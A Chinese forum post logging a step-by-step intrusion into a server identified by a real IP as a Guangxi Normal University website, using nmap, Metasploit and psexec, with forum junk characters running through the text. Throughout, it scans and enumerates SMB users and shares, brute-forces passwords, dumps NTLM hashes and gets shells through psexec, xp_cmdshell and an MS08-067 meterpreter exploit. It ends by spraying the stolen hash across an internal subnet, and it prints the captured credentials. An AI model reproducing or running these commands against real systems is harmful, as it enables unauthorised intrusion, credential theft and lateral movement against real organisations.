广西师范网站http://202.103.242.241/
4 T! p( z/ X- x7 @8 c
" _- ~8 ^- T1 z" m' b2 A" \5 Mroot@bt:~# nmap -sS -sV 202.103.242.241 ~- [2 C0 ?2 f$ _7 }$ s' z* t! E
* s; r# g5 l1 L0 ]
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST- l2 N h+ c! _/ w
& J) w( k6 F% Z% F: u! k# m
Nmap scan report for bogon (202.103.242.241)
" P! ?. \" E! F4 ~3 x% e
9 \" {% y* U& q4 W: ~- m7 E# YHost is up (0.00048s latency).3 \/ N, x2 c9 s$ H# L; ]/ S6 U; L
7 H- t0 r' K1 i) n3 v; e* r) y3 g
Not shown: 993 closed ports4 X( [4 ^$ u- p# L! n" w( z; V
( F3 T) y6 K! l9 [8 a8 T# l6 \; IPORT STATE SERVICE VERSION. l+ T! }2 L. d; k2 K
# A9 m) \$ Z2 |9 B/ R5 Q6 C
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
% ^3 @/ s. e0 u! w8 |7 l/ Y' E
$ B) m' t! u' g& B' Q* ~' b& ^139/tcp open netbios-ssn
: @6 ~1 N. \3 Y
( k, h) V6 r# n7 k$ ~( d. x445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
+ q( R6 m4 @' _7 a' o+ r' {' D% Y D0 W3 f: } [
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
7 S- |9 ?6 h# t! a9 n: {9 Q9 k$ e$ }
5 C( U. l5 I/ k, {6 ]8 v1026/tcp open msrpc Microsoft Windows RPC
* j/ ?0 [$ I. W& |! e7 ^; E" ]( I& P1 H, Q+ x
3372/tcp open msdtc?6 {5 C" ^! @& b* O( X+ u
0 z/ g" H& @+ f) C5 `- K3389/tcp open ms-term-serv?
. @3 s4 @0 H6 h$ ]0 n
6 K: w d* Q8 b- w1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi : q! q1 B& f S0 u7 Z2 ^
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r l. E$ o7 i* A( I' l8 l
! b1 o! c A1 ISF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
) G# Q0 C) n( y W
- O: Q$ E/ h% c4 v& USF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
, Y: U* G5 }& V2 k( k# Z3 p) w1 F
, _2 o8 r2 M8 ^6 Z( ZSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
3 x9 K! ]. i% g% ]7 R$ v7 z; l; z
# o# k7 R2 k% P" cSF:ptions,6,”hO\n\x000Z”);
{4 g* Z8 o1 J/ t) I& ?8 Q8 B( ]3 @1 y
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)9 \: t! ?8 Z Z" ^5 x( E
" `2 `1 n8 V0 u# dService Info: OS: Windows$ p: r1 C0 ?* _' s1 I- T% v
* V/ P( D- l$ Y: @3 z
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .* k9 O4 ^2 e' X1 p& a9 Q/ F8 ]
# B' n8 k' K, u( x LNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
1 k3 F6 S% S) E: E2 K
) Q" h3 x' o; }* k9 I+ X1 Zroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
; T, E, C% @( \
% ?. G$ X8 t. \6 ~ N y-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
- d4 F6 @( G1 V, z+ ?! B0 t
$ u- J/ b2 J# R3 [2 T-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse% c9 E, E2 z0 [5 K* h
% E/ i% o& U K5 ^+ u7 ]-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse- w/ R: C5 Q8 d P7 G4 U9 X
6 q2 u s T. P. I-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
- M/ N5 f1 ~4 f# R2 w" B; D5 W6 a
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse3 \7 I- y2 e; t9 L2 M5 S6 M. V
- Q& Q3 w; C3 x& @, ?$ B
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
; F' ~: R$ q3 _! H2 ?) R. [; j6 f$ ~6 ~% i- ~2 G7 H% ~: J
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse0 k4 h2 \# Y, s: c& K
3 ^3 U7 A. _4 d) A+ g" E' Q+ s
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse3 T& \5 V5 f* x- x9 S I: b0 c
1 c% e" j) O& y- Y; D& P% S, `-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse0 A1 }) F" ^# t( d- k- Z
4 F" P \ K i" ^. K" d-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse: l5 b& z/ j8 Z! ^8 s, D- h
8 W! b* ~9 L. w-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
- @2 [4 [2 c3 h( }% d1 i; Q5 X* @/ z/ T: R
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
7 c ?. R! Q- x: _+ p
/ z" R. g5 F& F$ l-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
, _" c: d8 B- i& s C( m6 s/ V- a8 \# U% l4 Q+ {* U- _# |
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
+ S: g; y Q' d& M( Z5 Y1 r# A- q$ r, t+ X
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
, P- A$ D4 y4 d) W; Z, R! ~7 }) I5 e: T0 Q
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
1 C! W6 {2 X$ e& z5 [+ |7 c$ n- Y$ L% g9 [ ?: s
//此乃使用脚本扫描远程机器所存在的账户名
F' V7 Z: q3 B; J3 C' L+ o- w, P3 O0 X+ I
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
) y/ I) p, w' V, Y1 e/ F- \1 T/ B9 [2 K' b
Nmap scan report for bogon (202.103.242.241): A, D# e7 b5 @
5 O5 c C. Q1 w& Y# |Host is up (0.00038s latency).
, i6 ~! k# q/ I! {3 Q3 a+ c7 j2 B/ d2 Y" T) i
Not shown: 993 closed ports. K7 G' N( ^" |, T( }& {, h
: [8 I/ B6 B( }* i( X/ Q
PORT STATE SERVICE
" C5 \2 r0 Q: y( U: U1 o; ]9 Y: t! t3 V% d8 g5 p/ y$ `; P' N' k
135/tcp open msrpc" g( y+ R( w. c; j' a
1 ]* E" g m5 c1 J0 c* m0 ^1 [2 j
139/tcp open netbios-ssn" ]/ a d1 t8 D1 P' r1 D
/ A2 m" O5 d6 R, c445/tcp open microsoft-ds
% L7 E7 r- q& W1 s4 j, y/ E+ W9 D( Z" Z& Y
1025/tcp open NFS-or-IIS6 j% w" a# j7 G5 l5 c: S& b8 d
( d4 r6 \' i6 U6 `# S
1026/tcp open LSA-or-nterm8 Y2 G$ R, U; }8 B4 ^% k. @
: y6 {8 o& D: J4 l# h
3372/tcp open msdtc/ @5 k9 {( r$ X0 ]3 s: c/ M
# s- Z, Y! J+ z! g5 F C3389/tcp open ms-term-serv4 \& k- j. p: k, R* i' R- d
$ U) U8 \- h' B: t: ~& x8 _7 }MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
' D6 A5 ?8 p$ z t- F
4 w3 _+ A* k1 X% ]; |Host script results:+ X( |, B, {1 {0 A2 P
: s: h( b2 x/ `4 C- f& y
| smb-enum-users:
$ Y2 C# G6 D7 p) j+ R: l2 T# P" L0 _7 H1 T& Z9 t/ P
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
& S$ U, ]# g/ X' M6 B" t9 T
3 i: | z. d. b" S. Y5 dNmap done: 1 IP address (1 host up) scanned in 1.09 seconds
! M7 ~0 z; s* b0 ? c0 N+ h" T( x4 V5 r2 D9 z8 K, F+ G2 F
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
9 C$ F5 A8 B: O! K* v- ~1 @9 l {5 q+ e
//查看共享
! J. D$ R2 e7 V j C' [* j4 y1 U) {9 U' ?& W* Z- M; B% j4 W/ K
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
$ \' O- n0 v: r) u0 N% ]8 Q) x7 N
& A/ I7 l$ |$ g% K. j1 C+ W o$ LNmap scan report for bogon (202.103.242.241). Q0 r$ w* @) G# @# L) Z2 S
8 S/ K8 c1 `3 S' b! Q
Host is up (0.00035s latency).) k( ] M; }& Q8 `
# I' j: R. C! tNot shown: 993 closed ports6 n$ W. _7 y6 {5 g+ Z
% K6 P n" f+ k. x) |* ^
PORT STATE SERVICE
4 w, d% b3 K4 E/ W/ V4 |" S, v6 E3 w( k9 ^& f
135/tcp open msrpc
3 W8 M L' S( x7 o8 M: K1 ]. I! t% u
139/tcp open netbios-ssn
, W" _6 x4 D4 Z0 E4 L1 {8 g& P/ q* ^- j
445/tcp open microsoft-ds2 W3 F F: u* G0 ^( e
( D9 `2 H5 N# s) y$ P% ]; ?6 ^) c' A
1025/tcp open NFS-or-IIS. K& ^) |5 E+ {, R$ ~) @+ W
% Q5 u: y: l1 A1026/tcp open LSA-or-nterm
) R. g- }8 j P5 X( n t2 C0 i5 K: G$ y! N$ a9 A# ?! t
3372/tcp open msdtc
: n2 s: m7 R5 |: T1 H9 E# f, k) ^' ~8 s
3389/tcp open ms-term-serv$ L; K5 i! Q' N2 Z
. l8 r, b% A/ j
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
3 C; x t" E7 Y0 E: f
6 e) S) r; C9 \# K' v, UHost script results:
4 t! b4 k$ g0 F. i0 D
+ ~6 l0 I# t0 f2 \* @| smb-enum-shares:3 K! s/ L5 {7 j5 A! r7 ~
( A) m' `8 }, R0 z h3 T| ADMIN$
* D: [6 e$ w: F
. l. q2 O m' ]/ @| Anonymous access: <none>4 [/ G/ h6 i' H: U/ F
# M) l7 J. g& W
| C$
/ m! r. \4 q. i$ `! c0 x4 R, C) ^# E& _6 ~$ }9 Y6 F
| Anonymous access: <none>& f/ T3 x7 k9 f1 l" s
0 {( [( Y7 n' F2 m7 J4 P| IPC$% Q4 E( X- {* i% U5 Q
, _ D' @) J9 W _. E
|_ Anonymous access: READ
7 C [( P A' y& ~0 E- F& D7 u; y1 b! }& E: Y$ d
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds( ^% l5 w4 e7 g3 O1 t
! B$ R ?' u' \7 o! o5 r5 _2 [root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241
- f, p' J& r" [" g- k( R0 l3 [+ `% C8 M$ k9 M
//获取用户密码) t2 a" S# }, q" P* ?3 r6 n' f2 o
; V2 b6 _4 M* j5 {9 |Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST% \3 W3 d* Q+ S; A! ]
4 k6 l5 p$ m2 O$ A# ]
Nmap scan report for bogon (202.103.242.2418)
# o3 K' t7 O& X9 G$ z+ w% B/ E
+ H9 e R' s: \; ^' Y% dHost is up (0.00041s latency).
9 C" G! A) A8 e8 S/ J( X+ Q; [, A! b4 B; h) L; Y
Not shown: 993 closed ports
1 F! J) H9 m% t: L) O8 |
4 t# J/ x/ h. x1 G2 BPORT STATE SERVICE
* e2 K4 ?( i/ T6 Q: {; v3 Z; V: ?9 O& r: T' | I- T* q$ B6 }
135/tcp open msrpc. f i' T5 R# G2 o
u2 v; @; \( w" w4 [4 A
139/tcp open netbios-ssn# _$ T9 k! F9 X. m2 C+ J
+ c R) T7 `6 s0 _/ D* s* w" G445/tcp open microsoft-ds
! K8 k( Z& l6 [
|9 L X/ q# x+ b& l d1025/tcp open NFS-or-IIS; [# _7 F2 V7 l/ g
6 m6 q5 U. I' i0 y" N! r1 n
1026/tcp open LSA-or-nterm
! J2 Z, V7 n$ ~+ p1 r( r7 W. z' d. T; Y$ L p3 _& M
3372/tcp open msdtc* c3 d5 H$ U7 V2 `& j
' t3 g2 ]- E* o- z" W% G( y6 G7 N
3389/tcp open ms-term-serv
" {& z2 U/ v9 y" e. e
$ D" i/ [0 M9 `: iMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)" T8 V4 ~+ a+ {( r4 p1 w
: G. _0 x: P2 U; X1 u$ C; fHost script results:
/ G2 h5 N; ]7 S: ?3 M+ o% k) R" H- u. ?" M; K
| smb-brute:2 s# P7 D: r# j! n* M9 g9 u
6 p2 m+ H6 ]) v' Q1 \6 [
administrator:<blank> => Login was successful5 x5 J* J* |$ ` }. T+ Z
6 V5 t$ z$ w, {1 t$ L# A|_ test:123456 => Login was successful
0 @8 N" h& n, I/ V8 G, L! [# B8 B& A$ k8 x7 C
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds6 M! B( ? ^% s% g% }5 Q D
; W2 y+ [; u/ o: b2 }root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash0 P% p3 U& y' ~8 B3 H0 q
' T9 A* m0 U0 Z: O# I2 [root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
% F' v3 D& F+ Z4 U! L3 ]# J: e7 U: k3 |! S$ l) O1 i
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse1 d/ T( V! G; a) b
2 Z1 {3 S: p( h9 n/ {5 |root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
" l9 x N* g. L8 ^/ A6 O) H/ y( C0 u
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST& ~/ l2 w* U- a
# B. e. }1 U1 d# C5 uNmap scan report for bogon (202.103.242.241)
5 D2 n; i8 B$ z B
- u. _( q! n* T' \Host is up (0.0012s latency).
3 m2 x M7 p* o' ~! G K; L4 y. z4 e7 p3 k% V
PORT STATE SERVICE. m' A G$ d& Z0 Y G" |
; _! J6 x$ v& G3 m4 \0 W135/tcp open msrpc
; P, _, E+ H0 v; e# T
2 Q9 P- X! U. g1 D) p139/tcp open netbios-ssn1 T4 Z2 v' Z) a6 q2 B m: A, t" t. N! t
* z. P% [8 t* I: I; Y- M4 h, Q
445/tcp open microsoft-ds# `7 ]7 r c8 X- ~, o5 c, |
0 p* F3 ?/ g* D2 O: z* }
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)8 |. f: }# C& R
; Y; d% C" c Y9 }; [
Host script results:. {/ B# I4 e7 J; t. Z7 l9 C$ q- [
/ o. @' O4 A( Y% R$ e| smb-pwdump:2 }# r# m5 l; e& S
+ C: m& o& s# h5 E| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************1 \# D: j4 B R# j& y1 O
: H: s6 U3 i# G+ m! x2 X| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************0 Z4 |. b4 c v- x
0 V$ c3 b- w8 @- L) I( [
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
# k7 `; ~* _1 h! l& S
3 g% E9 X) r& c" x1 d|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
) p( J, k; {( x1 W: i- Y# U5 k* M" S$ C+ B
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds3 k& f: }! _& W; r4 _/ K9 Z
& y; n7 q3 d6 V" YC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell0 V% `6 J, N$ m: Z8 _
) M# Z& D& j1 ?& x3 o1 i
-p 123456 -e cmd.exe
. Y9 J' x8 c4 @, K
; \+ L7 K* u; e D' a: FPsExec v1.55 – Execute processes remotely
_+ M! J) _) ?4 Q/ ]7 R
. H0 {! U% { l9 O* R* j, oCopyright (C) 2001-2004 Mark Russinovich
/ d" V7 o* Q8 |. |
' q9 A' T9 p5 Z- p6 b) ]& qSysinternals – www.sysinternals.com2 M: _9 `, L( r0 \% D; S1 g
/ F8 r7 k, W( _) O+ uMicrosoft Windows 2000 [Version 5.00.2195]
$ V' R4 {6 y5 ^5 Z. ?3 A4 u4 x- H5 A7 L0 W7 ~, V7 b: z
(C) 版权所有 1985-2000 Microsoft Corp.; e: \% z) j. k* f) ~. y, `9 F
9 @5 d @1 r U4 Q5 W$ P
C:\WINNT\system32>ipconfig
/ Y* x) K0 T/ q3 X3 ?# G2 V, i! D& a( s+ P) H
Windows 2000 IP Configuration6 c/ Z2 O4 Z3 I7 ?/ G7 x
; y- S. h- C0 I8 Y# I+ {Ethernet adapter 本地连接:( a+ p/ B- j& E- Q h( p
/ _: V; Y k& q0 S! N
Connection-specific DNS Suffix . :+ L9 y; x. t# g" R; v. P) e
W' J$ \: C$ Z4 g C" t
IP Address. . . . . . . . . . . . : 202.103.242.2413 n/ q: S% `& U2 v
0 Z; D0 n$ f6 ?% u
Subnet Mask . . . . . . . . . . . : 255.255.255.01 W) W! U/ S7 t! ]) q
, Z$ K, O" N, M; z* ]5 b* S: Y/ xDefault Gateway . . . . . . . . . : 202.103.1.1; d" T+ d7 t" M/ \
( L% ]0 v. o' |& V3 h( v
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
8 `0 T6 _& z8 ]' G/ L9 m7 ?: H+ N% h
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞9 S! `% t- y( O
) e$ K- @( X2 R! K/ d
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
9 X2 e. a# ~8 ?5 m. G
, m" y+ ~. Q- B. e+ a% z. u: A- I9 pNmap scan report for bogon (202.103.242.241)
7 w5 r) y. S! y- N* ~# h b# t0 Q2 W- l) g, z+ Y Q( A
Host is up (0.00046s latency).
, x; e# ^' e$ ^5 M: L( r3 l( _2 t+ m, v
N; w! x3 ?8 L6 I4 W5 R( }Not shown: 993 closed ports
) a t# |" Q' n4 Y) @, S5 g/ ?2 A! P5 a
PORT STATE SERVICE! r5 y' l* M U; `5 p9 c; c
' p E ?$ a0 y5 _
135/tcp open msrpc/ z$ a# e! ^3 n* z
" e1 W; S- @! u. v4 Q139/tcp open netbios-ssn+ G y! N; S9 P0 a8 D: i
8 ^# y( ~% E; b0 a445/tcp open microsoft-ds! @- h$ z' w' K3 g* ^
0 r0 D7 F( \, l w' B
1025/tcp open NFS-or-IIS. v% X N0 v5 q5 S
# e, H7 o. D @4 R9 b1026/tcp open LSA-or-nterm- |' g1 ?# `2 C8 C! J1 S6 D! D
3 W# X! F' @5 w% `* J3372/tcp open msdtc
# {6 d$ X; E! `: L- `4 u& B* f3 j8 x5 c0 n2 G9 o# E, e
3389/tcp open ms-term-serv
$ d; b5 t1 t! K4 D
7 h8 l7 {0 [+ h) C1 b0 iMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)6 |; J# S6 _! t4 V4 `
1 K; q ^- _1 U3 o9 C
Host script results:, m+ [+ A, O! J' v2 B
0 e6 J; y% e1 ^8 Z- n; l! c; J& K
| smb-check-vulns:
% q2 F/ b: L* y' j x/ k: G4 W. l
|_ MS08-067: VULNERABLE* ^7 W3 L: ~/ i# u0 A- w9 _! {
: {% n/ b S. b1 ~' V G& z: b
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds, U8 M, m) V& r4 Q6 F! a Z+ N
% z0 y/ y) b& N. X) W( Mroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出! Z @5 n ]4 r+ C) d$ j
- c3 \, W7 i) }8 |3 l& n
msf > search ms08
. _, s2 w8 U+ E: m, n4 l/ \- W, |+ x
, r# _3 ~( Z# P1 A7 B7 Nmsf > use exploit/windows/smb/ms08_067_netapi
& ]3 w# n& o; U2 W
8 c# `* u0 |: h& umsf exploit(ms08_067_netapi) > show options
( g; A/ B9 L v+ |$ S& k
* ^) Y# A1 e$ n/ i1 m, i- [# I9 nmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
6 `9 o$ R. V# ], I7 {0 K8 Q; P
! p6 W! {, x @! p c% xmsf exploit(ms08_067_netapi) > show payloads2 z# o0 @: d: L% m0 F6 o; {
6 [# l0 e1 \2 t- J5 V/ E lmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp7 p, [ W0 K* N. }1 i
G. {; I( ~" \msf exploit(ms08_067_netapi) > exploit
* s$ q% q. T" N) ^& i" j/ N6 ]/ k% U2 m/ j; [7 K7 B+ R0 Z
meterpreter >
0 F+ S/ e' z0 s6 K! M/ x+ l' f( R, c8 O3 g9 l1 b$ B( W
Background session 2? [y/N] (ctrl+z)! Q \$ D' ~8 ^- L* u& {3 g' y
9 q: D. Q5 s' P. N) }
msf exploit(ms08_067_netapi) > sessions -l
9 [/ A4 `1 C. R9 n/ ]2 P9 a/ u- s/ U" P" ?6 e( g8 s: ^
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt: Q y+ r! x5 N' N8 d
" S" m4 ~1 H. J# }8 [test
$ h, Y+ G; @3 |' c3 t+ r
: g9 D- v$ F2 O9 s4 }! ~- ~5 Kadministrator
+ O) y$ b7 r9 A0 T, \& E$ @2 `3 I& ?. Y! l( y( j k
root@bt:/usr/local/share/nmap/scripts# vim password.txt, n- \% K$ W* i5 m9 m
( ~' X, m' L) u5 l5 i# p# X) F" ?44EFCE164AB921CAAAD3B435B51404EE
* T8 R6 w6 H4 j+ K
. _- F2 M5 i Troot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 3 y* P( N( O9 Q( u
8 R/ @$ G. H9 j$ J6 `
//利用用户名跟获取的hash尝试对整段内网进行登录9 M( B) Q* v+ u9 a' I1 z3 }) |
; Y9 }( R2 r0 \: y; q2 g1 q: t* e9 e
Nmap scan report for 192.168.1.105+ {# i: H5 E7 E% s/ Z
1 _- R* Q+ h6 w* e# p, h ^; u2 CHost is up (0.00088s latency).% n; c' X5 _% A+ Z5 x. F
/ Y3 W5 E9 f$ l& z; d
Not shown: 993 closed ports/ F& D5 y2 o2 l1 E; U
0 E9 C4 y; o5 _/ `" TPORT STATE SERVICE
9 r+ w# q- S. Q% K2 J, X1 ~
. k# F5 a3 v! o+ S, ?8 x/ T135/tcp open msrpc. M3 k+ q# l' R/ q) G
( J6 S- g9 P) {0 A6 f7 J5 }9 P3 Q139/tcp open netbios-ssn
* S1 K' I* e7 _5 l" ~; V, U) D
! I) T! e2 S% w" C" \' w445/tcp open microsoft-ds
- ~4 h' J4 _# N8 M4 }4 {
; c5 Q2 O1 s* [# S1025/tcp open NFS-or-IIS0 t. b2 U' i* s1 f o
5 N7 O- U6 a9 l+ J+ U3 \
1026/tcp open LSA-or-nterm
4 ]" c( |: C9 T T- I2 N2 S
: v8 I s' U- ~3 U3 ^3 A" v4 Q3372/tcp open msdtc7 ?# E+ C1 m: N
% r! [9 @/ N. g* D: _ c3389/tcp open ms-term-serv. X6 P7 m* |8 p% R4 I& ]1 `. n7 G
) _$ T2 i, z1 V* FMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
0 ~5 }+ t" i1 W# }* T
, O3 @2 _4 \2 [9 C" \# PHost script results: ]" {+ K8 J" l0 J* R
9 E! U7 K5 `% _( R, E8 \| smb-brute:
, [& V) W1 [, U7 F" {3 Z6 x# `7 h
8 H5 H0 D: Y2 P# ^* B, b# j|_ administrator:<blank> => Login was successful
. i$ q0 U- Y [$ ?* _$ s3 C8 D9 `1 ^9 ~
攻击成功,一个简单的msf+nmap攻击~~·
* c: i& S9 V7 Z# O& D5 e9 ]5 z
! x* L: H$ h5 j( v |
发表于 2012-12-4 12:46:42
收藏
支持
反对